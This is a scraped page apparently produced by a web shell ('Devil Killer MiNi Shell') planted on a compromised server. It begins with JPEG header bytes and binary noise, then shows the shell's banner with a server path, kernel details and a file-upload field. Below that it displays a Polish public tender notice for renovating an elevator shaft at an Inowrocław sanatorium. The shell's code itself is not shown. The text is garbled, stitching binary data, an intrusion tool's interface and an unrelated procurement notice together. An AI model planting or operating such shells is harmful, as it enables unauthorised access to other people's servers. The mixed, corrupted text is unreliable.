JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240625/0038225101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Remont szybu windowego z montażem windy o napędzie elektrycznym <br/>w Sanatorium Uzdrowiskowym „Przy Tężni” <br/>im. dr Józefa Krzymińskiego w Inowrocławiu s.p.z.o.z. ” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SANATORIUM UZDROWISKOWE &#34;PRZY TĘŻNI&#34; IM. DR JÓZEFA KRZYMIŃSKIEGO W INOWROCŁAWIU S.P.Z.O.Z.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010625117</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Przy Stawku 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Inowrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@przytezni.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.przytezni.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Remont szybu windowego z montażem windy o napędzie elektrycznym <br/>w Sanatorium Uzdrowiskowym „Przy Tężni” <br/>im. dr Józefa Krzymińskiego w Inowrocławiu s.p.z.o.z. ” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d983248b-32e3-11ef-acf6-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00382251</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00025489/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 „Remont szybu windowego z montażem windy o napędzie elektrycznym w Sanatorium Uzdrowiskowym „Przy Tężni” im. dr Józefa Krzymińskiego w Inowrocławiu s.p.z.o.z. ”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/przytezni <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Informacje wskazane w SWZ<br/>https://platformazakupowa.pl/pn/przytezni</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami odbywa się w formie elektronicznej za pośrednictwem platformy w odniesieniu do wszelkich oświadczeń, wniosków, zawiadomień oraz informacji.<br/>2. Oferta powinna być:<br/>a)	sporządzona na podstawie załączników niniejszej SWZ w języku polskim,<br/>b)	złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl,<br/>c)	podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione<br/>3.	Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektro-nicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>4. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>5. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupo-wa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Koresponden-cja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie prze-kazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>6. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności po-dejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakład-ce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>7.	Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert pod warunkiem że wniosek o wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert.<br/>Pozostałe informacje wskazane są w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1.	Administratorem Pani/Pana danych osobowych jest Sanatorium Uzdrowiskowe &#34;Przy Tężni&#34;im. dr Józefa Krzymińskiego w Inowrocławiu s.p.z.o.z. z siedzibą w Inowrocławiu, ul. Przy Stawku 12, 88-100 Inowrocław.<br/>2.	Wyznaczono Inspektora Ochrony Danych Osobowych i mogą Państwo się z nim kontaktować za pośrednictwem poczty elektronicznej pod adresem: iod@przytezni.pl.<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b, c i f RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego tj. uczestnictwem w prowadzonym postępowaniu, zawarciem oraz wykonaniem umowy , w tym składanie reklamacji oraz kontaktowanie się w związku z realizacją umowy, realizacji obowiązków wynikających z przepisów podatkowych i rachunkowych , dochodzenie roszczeń lub obrony przed roszczeniami<br/>4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), dalej ustawa Pzp<br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Prawo zamówień publicznych, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/ Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych.<br/>7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8.	Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych oraz otrzymania ich kopii;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Prawo zamówień publicznych oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-6-2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem umowy jest „Remont szybu windowego z montażem windy o napędzie elektrycznym w Sanatorium Uzdrowiskowym „Przy Tężni” im. dr Józefa Krzymińskiego w Inowrocławiu s.p.z.o.z. ”<br/>2.	Szczegółowy zakres wykonania przedmiotu umowy określa: <br/>a)	kosztorys ofertowy Wykonawcy – zał. nr 1 do umowy,<br/>b)	Harmonogram Rzeczowo – Finansowy stanowiący załącznik nr 2 do umowy,<br/>Dokumenty wskazane powyżej stanowią integralną część umowy. <br/>3.	Wykonawca w ramach realizacji umowy zobowiązany jest m. in do: <br/>a)	demontażu istniejącego dźwigu wraz z utylizacją,<br/>b)	remontu szybu windowego, <br/>c)	remontu pomieszczenia po demontażu starego dźwigu do montażu nowego dźwigu,<br/>d)	dostawy nowego dźwig ,<br/>e)	montażu nowego dźwigu ,<br/>f)	realizacji przedmiotu umowy oraz zapewnienia materiałów i urządzeń niezbędnych dla jej realizacji,<br/>g)	uzyskania zgody na eksploatację dźwigu wydanej przez Urząd Dozoru Technicznego.<br/>4.	Wykonawca zobowiązuje się wykonać przedmiot umowy zgodnie z obowiązującymi przepisami oraz normami, przy użyciu materiałów i urządzeń własnych. Wykonawca zagwarantuje, iż jakość materiałów, wyrobów i innych urządzeń użytych do wykonania przedmiotu umowy jest zgodna z wszelkimi norma-mi i atestami obowiązującymi w tym zakresie.<br/>5.	Wykonawca przedstawi Zamawiającemu Harmonogram Rzeczowo-Finansowy dla zakresu objętego przedmiotem umowy w terminie 7 dni roboczych od dnia zawarcia umowy. Harmonogram Rzeczowo-Finansowy będzie zawierał terminy wykonania poszczególnych obowiązków Wykonawcy wynikających z zawartej umowy.<br/>6.	Harmonogram Rzeczowo-Finansowy, o którym mowa w ust. 5 staje się z chwilą podpisania przez Stro-ny integralną częścią umowy – tj. Załącznikiem nr 2 do umowy.<br/>7.	Wykonawca oświadcza, że dysponuje odpowiednim potencjałem techniczno-organizacyjnym, kadro-wym, finansowym oraz uprawnieniami, wiedzą i doświadczeniem pozwalającym na należyte zrealizo-wanie przedmiotu umowy. <br/>8.	Wykonawca zobowiązuje się, że dźwig i aparatura sterowa nie będzie posiadać kodowanych zabezpie-czeń, uniemożliwiających konserwację innym firmom poza producentem.<br/>9.	Wykonawca przekaże Zamawiającemu dokumentację dźwigu, książkę rewizyjną dźwigu oraz instrukcję eksploatacji dźwigu (w tym konserwacji) najpóźniej w dniu odbioru końcowego /w języku polskim/. Wykonawca zobowiązany jest do przekazywania Zamawiającemu wszelkiej dokumentacji w języku pol-skim.<br/>10.	Zakres przedmiotu umowy obejmuje również przeszkolenie pracowników Zamawiającego, tj. konserwa-torów, kierownika i zastępcy Komórki Rozwoju w zakresie zapewniającym właściwą obsługę dźwigu .<br/>11.	Wykonawca nie może bez zgody Zamawiającego powierzyć wykonania umowy osobom trzecim – in-nym niż wskazanym w formularzu ofertowym. W przypadku powierzenia wykonania umowy osobom trzecim Wykonawca ponosi wyłączną odpowiedzialność wobec Zamawiającego z tytułu jej wykonania. <br/>12.	Wykonawca jest zobowiązany do umożliwienia Zamawiającemu kontroli wykonywania umowy, a w szczególności do przedstawiania wszelkich dokumentów i informacji związanych z wykonywaniem umowy oraz składania oświadczeń wymaganych przez Zamawiającego. Zamawiający lub upoważniony przez niego podmiot ma prawo do dokonywania kontroli wykonywania umowy w każdym momencie, a w szczególności ma prawo wglądu we wszelkie dokumenty związane z wykonywaniem umowy przez Wykonawcę. <br/>13.	Wszystkie prace prowadzone w ramach umowy będą prowadzone w sposób minimalizujący zakłócenia organizacji pracy Zamawiającego, w tym w szczególności w sposób zapewniający zachowanie komuni-kacji między piętrami budynku.<br/>14.	Wykonawca zobowiązany jest do przedkładania Zamawiającemu, na jego pisemne żądanie, zgłoszone w każdym czasie obowiązywania umowy, w terminie wskazanym przez Zamawiającego uwzględniającym uzasadniony czas potrzebny do ich przygotowania, wszelkich dokumentów, materiałów i informacji w zakresie niezbędnym do dokonania przez Zamawiającego oceny prawidłowości wykonania umowy, a także w zakresie niezbędnym do wykonania przez Zamawiającego obowiązków informacyjnych.<br/><br/>15.	Parametry techniczne dźwigu <br/>Dane dźwigu:<br/>- typ: osobowy<br/>- napęd: elektryczny<br/>- udźwig: 630 kg/ 8 osób<br/>- wysokość podnoszenia: 10,0 m<br/>- prędkość (m/s): 1.0<br/>- ilość przystanków / dojść: 4p/4d<br/>- zasilanie trójfazowe 400 V<br/>Kabina:<br/>- wymiary: (szer. x gł. x wys.): 1100mmx1400mmx2100 mm<br/>- panele ścienne: - stal nierdzewna<br/>- lustro na tylnej ścianie<br/>- poręcz: – stal nierdzewna<br/>- wyświetlacz: LED<br/>- oświetlenie: LED<br/>- podłoga: PCV trudnościeralna<br/><br/>Drzwi kabinowe:<br/>- wymiary (szer. x wys. ): 900mmx2000mm<br/>- typ: automatyczne teleskopowe, 2-panelowe<br/>- kurtyna świetlna<br/>- próg aluminiowy<br/><br/>Drzwi szybowe:<br/>- wymiary (szer. x wys. ): 900mmx2000mm<br/>- typ: automatyczne teleskopowe<br/>- drzwi o odporności ogniowej EI 60<br/>- próg aluminiowy<br/><br/>Inne: <br/>- piętrowskazywacz na przystanku podstawowym<br/>- intercom<br/>- oświetlenie awaryjne <br/>- zjazd p.poż na stałym zasilaniu<br/>- przyciski z oznaczeniami Braill`a, przycisk zamykania drzwi<br/>- automatyczny zjazd na najbliższy przystanek w przypadku zaniku prądu<br/><br/>16. Zaleca się po uprzednim zgłoszeniu telefonicznym bądź pisemnym do przeprowadzenia wizji lokalnej w celu uzyskania wszelkich informacji koniecznych do właściwego przygotowania oferty. <br/>Kontakt telefoniczny: <br/><br/>Z-ca Kierownika Komórki Rozwoju Sylwia Bąkowska nr tel. 507 139 787<br/><br/>Prowadzone postępowanie dofinansowane jest w części ze środków Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45313100-5 - Instalowanie wind</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o braku podstaw do wykluczenia z postępowania zał. nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o spełnianiu warunków udziału w postępowaniu zał. nr 2</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Opisy lub fotografie oferowanego dźwigu (windy) w postaci: katalogów, ulotek, etykiet handlowych lub innych dokumentów potwierdzających spełnienie wymagań określonych przez zamawiającego; <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> •	Opisy lub fotografie oferowanego dźwigu (windy) w postaci: katalogów, ulotek, etykiet handlowych lub innych dokumentów potwierdzających spełnienie wymagań określonych przez zamawiającego; <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Dokumenty wymagane przez Zamawiającego, które należy złożyć wraz z ofertą:<br/><br/>1.	Formularz ofertowy zał. nr 1 do SWZ.<br/>2.	Kosztorysu ofertowy / kosztorys sporządzony w programie kosztorysowym, w formie elektronicznej/<br/>Kosztorys ofertowy wymagany w związku z dofinansowaniem przedmiotu zamówienia w części ze środków Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych.<br/><br/>3.	Oświadczenie o spełnianiu warunków udziału w postępowaniu zał. nr 2 oraz oświadczenie o braku podstaw do wykluczenia z postępowania zał. nr 3 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>•	oświadczenie o spełnianiu warunków udziału w postępowaniu tj. zał. nr 2 składa każdy z Wykonawców,<br/>• oświadczenie o braku podstaw do wykluczenia z postępowania zał. nr 3 składa każdy z Wykonawców<br/><br/>4.	Zamawiający żąda złożenia przez Wykonawcę wraz z ofertą następujących środków przedmiotowych:<br/>•	Opisy lub fotografie oferowanego dźwigu (windy) w postaci: katalogów, ulotek, etykiet handlowych lub innych dokumentów potwierdzających spełnienie wymagań określonych przez zamawiającego;<br/><br/>5.	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawców wspólnie ubiegających się o zamówienie w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – w przypadku wspólnego ubiegania się o zamówienie przez wykonawców,<br/>Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy w przedmiotowym postępowaniu – w przypadku podpisania oferty przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) wykonawcy.<br/><br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (w formie elektronicznej lub postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem <br/> elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez 